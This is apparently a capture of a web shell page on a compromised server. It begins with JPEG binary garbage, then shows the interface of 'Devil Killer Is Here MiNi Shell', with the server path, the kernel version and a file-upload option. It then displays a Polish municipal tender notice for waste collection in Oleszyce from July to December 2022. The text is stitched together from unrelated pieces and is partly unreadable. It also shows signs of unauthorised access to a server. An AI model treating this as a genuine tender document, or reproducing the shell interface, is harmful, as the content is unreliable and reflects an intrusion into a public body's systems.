JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220609/0020272901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Odbiór i zagospodarowanie odpadów komunalnych z terenu Miasta i Gminy Oleszyce w okresie od 01.07.2022 do 31.12.2022 r. ” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Oleszyce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900619</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oleszyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-630</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">166315010</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">166315636</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretarjat@oleszyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.oleszyce.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Odbiór i zagospodarowanie odpadów komunalnych z terenu Miasta i Gminy Oleszyce w okresie od 01.07.2022 do 31.12.2022 r. ” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-66e885b3-e72a-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00202729</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.12.) Rodzaj wykonawców, którzy mogą ubiegać się o udzielenie zamówienia: </h3> <p class="mb-0">art. 94 ust. 1 pkt 1) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 4) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 6) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 8) ustawy</p> <p class="mb-0">art. 94 ust. 1 pkt 10) ustawy</p> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-66e885b3-e72a-11ec-9a86-f6f4c648a056 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">5.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego zobowiązany jest posiadać konto na Platformie Zamówień Publicznych: ezamowienia.gov.pl (zwanej dalej „platformą”). Zarejestrowanie i utrzymanie konta na platformie oraz korzystanie z platformy jest bezpłatne. <br/>Komunikacja o udzielenie zamówienia odbywa się drogą elektroniczną przy użyciu platformy, ePUAP-u /umigoleszyce/skrytka i poczty elektronicznej urzędu oraz osób wskazanych do kontak</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">5.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego zobowiązany jest posiadać konto na Platformie Zamówień Publicznych: ezamowienia.gov.pl (zwanej dalej „platformą”). Zarejestrowanie i utrzymanie konta na platformie oraz korzystanie z platformy jest bezpłatne. <br/>Komunikacja o udzielenie zamówienia odbywa się drogą elektroniczną przy użyciu platformy, ePUAP-u /umigoleszyce/skrytka i poczty elektronicznej urzędu oraz osób wskazanych do kontak</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">bip.oleszyce.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BGP.271.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szacunkowa ilość odpadów do zebrania i zagospodarowania w okresie obowiązywania umowy. <br/>1) Zmieszane odpady komunalne 380 Mg <br/>2) Tworzywa sztuczne, opakowania wielomateriałowe 80 Mg <br/>3) Szkło 60 Mg <br/>4) Papier, tektura 20 Mg <br/>5) Sprzęt elektryczny i elektroniczny 5 Mg <br/>6) Meble i odpady wielkogabarytowe 40 Mg <br/>7) Zużyte opony z samochodów osobowych, rowerów i motocykli 5 Mg<br/>8) Odpady z budowy remontu i demontaży 5 Mg<br/>9) Przeterminowane leki, chemikalia 0,10 Mg<br/>10) Baterie i akumulatory 0,40 Mg<br/>11) Tekstylia i odzież 0,5 Mg <br/>12) Bioodpady i odpady zielone 20 Mg<br/>13) Popioły i żużle 1 Mg </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511200-4 - Usługi gromadzenia odpadów pochodzących z gospodarstw domowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 641355,75 <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-07-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Szacunkowa ilość odpadów do zebrania i zagospodarowania w okresie obowiązywania umowy. <br/>1) Zmieszane odpady komunalne 380 Mg <br/>2) Tworzywa sztuczne, opakowania wielomateriałowe 80 Mg <br/>3) Szkło 60 Mg <br/>4) Papier, tektura 20 Mg <br/>5) Sprzęt elektryczny i elektroniczny 5 Mg <br/>6) Meble i odpady wielkogabarytowe 40 Mg <br/>7) Zużyte opony z samochodów osobowych, rowerów i motocykli 5 Mg<br/>8) Odpady z budowy remontu i demontaży 5 Mg<br/>9) Przeterminowane leki, chemikalia 0,10 Mg<br/>10) Baterie i akumulatory 0,40 Mg<br/>11) Tekstylia i odzież 0,5 Mg <br/>12) Bioodpady i odpady zielone 20 Mg<br/>13) Popioły i żużle 1 Mg</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Do wyliczenia kryterium brana będzie kwota łączna wykonania przedmiotu zamówienia, podana przez Wykonawcę w formularzu oferty. <br/> <br/>b)	kryterium „termin płatności” będzie oceniany następująco: <br/>•	faktura płatna w terminie 14 dni od dnia dostarczenia jej Zamawiającemu – 0 punktów, <br/>•	faktura płatna w terminie 20 dni od dnia dostarczenia jej Zamawiającemu – 15 punktów, <br/>•	faktura płatna w terminie 25 dni od dnia dostarczenia jej Zamawiającemu – 25 punktów. <br/> <br/>c)	kryterium „aspekt środowiskowy” będzie oceniany następująco:<br/>3 samochody - 15 pkt<br/>2 samochody - 10 pkt<br/>1 samochód - 5 pkt<br/>0 samochodów - 0 pkt<br/> <br/>spełniających wymagania w zakresie co najmniej normy EURO 5</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">aspekt środowiskowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <p class="mb-0">wymagania dotyczące określonej etykiety, zgodnie z art. 104 ustawy - etykiety środowiskowej (tzw. Ekoetykieta)</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu <br/>1. O udzielenie zamówienia może ubiegać się Wykonawca, który: <br/>1)	nie podlega wykluczeniu – patrz rozdział 6; <br/>2)	spełnia warunki udziału w postępowaniu dotyczące: <br/>a)	kompetencji lub uprawień do prowadzenia określonej działalności zawodowej posiada: <br/>- aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez Burmistrza Miasta i Gminy Oleszyce (o którym mowa w art. 9b ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach) – Zamawiający sprawdzi ten warunek na podstawie prowadzonego przez siebie rejestru; <br/>-aktualny wpis do prowadzonego przez marszałka województwa właściwego dla siedzimy Wykonawcy rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami (BDO, Dział VII) w zakresie kodów odpadów komunalnych, objętych przedmiotem zamówienia (o którym mowa w art. 49 i 234 ustawy o odpadach). <br/> <br/>b) sytuacji ekonomicznej lub finansowej: <br/>- posiadania na czas trwania umowy ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 500 000 zł (słownie: pół miliona złotych) <br/>Uwaga: w przypadku posiadania umowy wyrażonej w innej walucie niż złoty polski, zostanie ona przeliczona według średniego kursu NBP na dzień zawarcia umowy dot. przedmiotu zamówienia; <br/> <br/><br/>c)	sytuacji technicznej lub zawodowej:<br/>1) W celu realizacji przedmiotu umowy Wykonawca musi dysponować specjalistycznymi środkami technicznymi umożliwiającymi odbiór odpadów<br/>- co najmniej dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych <br/>- oraz co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zbieranych odpadów komunalnych <br/>- co najmniej jednym pojazdem do odbierania odpadów bez funkcji kompaktującej (tj. samochód dostawczy o ładowności ok. 2,5 tony – umożliwiający odbiór odpadów komunalnych z trudno dostępnych terenów).<br/>Pojazdy muszą być:<br/>- trwale i czytelnie oznakowane, w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne;<br/>- zarejestrowane i dopuszczone do ruchu oraz posiadać aktualne badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu drogowym;<br/>- Pojazdy i urządzenia będą zabezpieczone przed niekontrolowanym wydostaniem się na zewnątrz odpadów podczas ich magazynowania, przeładunku i transportu;<br/>Konstrukcja pojazdów musi zabezpieczać przed rozwianiem i rozpylaniem przewożonych odpadów oraz minimalizować oddziaływanie czynników atmosferycznych na odpady;<br/>- Pojazdy będą wyposażone w:<br/>- System monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów oraz czujniki zapisujące dane o miejscach wyładunku odpadów a także umożliwiające weryfikację tych danych,<br/>- W narzędzia i urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników;<br/>- Pojazdy przeznaczone do realizacji przedmiotu zamówienia należy garażować wyłącznie na terenie posiadanej bazy magazynowo – transportowej.<br/>2)W celu realizacji przedmiotu umowy wykonawca musi dysponować odpowiednio usytuowaną i wyposażoną bazą magazynowo – transportową odpowiadającą wymaganiom technicznym określonym w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z 2013 r. nr 122).<br/>- Podmiot odbierający odpady komunalne od właścicieli nieruchomości jest obowiązany posiadać bazę magazynowo - transportową usytuowaną:<br/>- w gminie, z której terenu odbiera te odpady, lub w odległości nie większej niż 60 km od granicy tej gminy;<br/>- na terenie, do którego posiada tytuł prawny.<br/>- W zakresie wyposażenia bazy magazynowo-transportowej należy zapewnić, aby:<br/>•	na terenie bazy magazynowo-transportowej znajdowały się urządzenia do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania<br/>•	teren bazy magazynowo-transportowej był zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym;<br/>•	miejsca przeznaczone do parkowania pojazdów były zabezpieczone przed emisją zanieczyszczeń do gruntu;<br/>•	miejsca magazynowania selektywnie zebranych odpadów komunalnych były zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych;<br/>•	teren bazy magazynowo-transportowej był wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001r. - Prawo wodne (Dz. U. z 2017r. poz. 1566);<br/>•	baza magazynowo-transportowa winna być wyposażona w:<br/>a)	miejsca przeznaczone do parkowania pojazdów,<br/>b)	pomieszczenie socjalne dla pracowników odpowiadające liczbie zatrudnionych osób,<br/>c)	miejsca do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych,<br/>d)	legalizowaną samochodową wagę najazdową - w przypadku gdy na terenie bazy następuje magazynowanie odpadów.<br/>•	Na terenie bazy magazynowo-transportowej powinny znajdować się także:<br/>- punkt bieżącej konserwacji i napraw pojazdów,<br/>- miejsce do mycia i dezynfekcji pojazdów o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej.<br/>•	Część transportowa oraz część magazynowa bazy mogą znajdować się na oddzielnych terenach, przy jednoczesnym spełnieniu im odpowiadającym.<br/><br/>2.	Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. <br/>3.	Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <br/>4.	Wykonawca może w celu potwierdzenia spełniania warunków polegać na zdolnościach technicznych lub zawodowych, albo sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. <br/>5.	Wykonawca nie może po upływie terminu składania ofert powoływać się na zdolności techniczne lub zawodowe, albo sytuację finansową lub ekonomiczną podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostepniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu <br/>1. Wykonawca składa oświadczenie woli w postaci oferty, której wzór stanowi załącznik nr 4 do SWZ i dołącza do niej: <br/>1) oświadczenie o spełnianiu warunków oraz niepodleganiu wykluczeniu – wg wzoru stanowiącego załącznik nr 5 do SWZ; 2) pełnomocnictwo – jeżeli oferta wraz z oświadczeniem składana jest przez pełnomocnika. <br/> <br/>2.	Oświadczenia, zaświadczenia i dokumenty potwierdzające spełnianie warunków, o których mowa w rozdziale 5 – składane na wezwanie Zamawiającego: <br/>1)	oświadczenie o posiadaniu aktualnego wpisu do prowadzonego przez marszałka województwa właściwego dla siedzimy Wykonawcy rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami (BDO, Dział VII) w zakresie kodów odpadów komunalnych, objętych przedmiotem zamówienia – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>2)	oświadczenie o posiadaniu na czas trwania umowy polisy ubezpieczeniowej lub innego dokumentu potwierdzającego, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie realizacji umowy – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>Uwaga: w przypadku wątpliwości Zamawiający może zażądać okazania poświadczeń lub referencji poświadczających wykonanie wykazanych usług. <br/>3)	oświadczenie o dysponowaniu pojazdami – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>4)	oświadczenie o dysponowaniu bazą magazynowo - transportową – wg wzoru stanowiącego załącznik nr 6 do SWZ; <br/>5)	oświadczenie dot. grupy kapitałowej – wg wzoru stanowiącego załącznik nr 7 do SWZ; <br/>6)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; <br/>7)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem 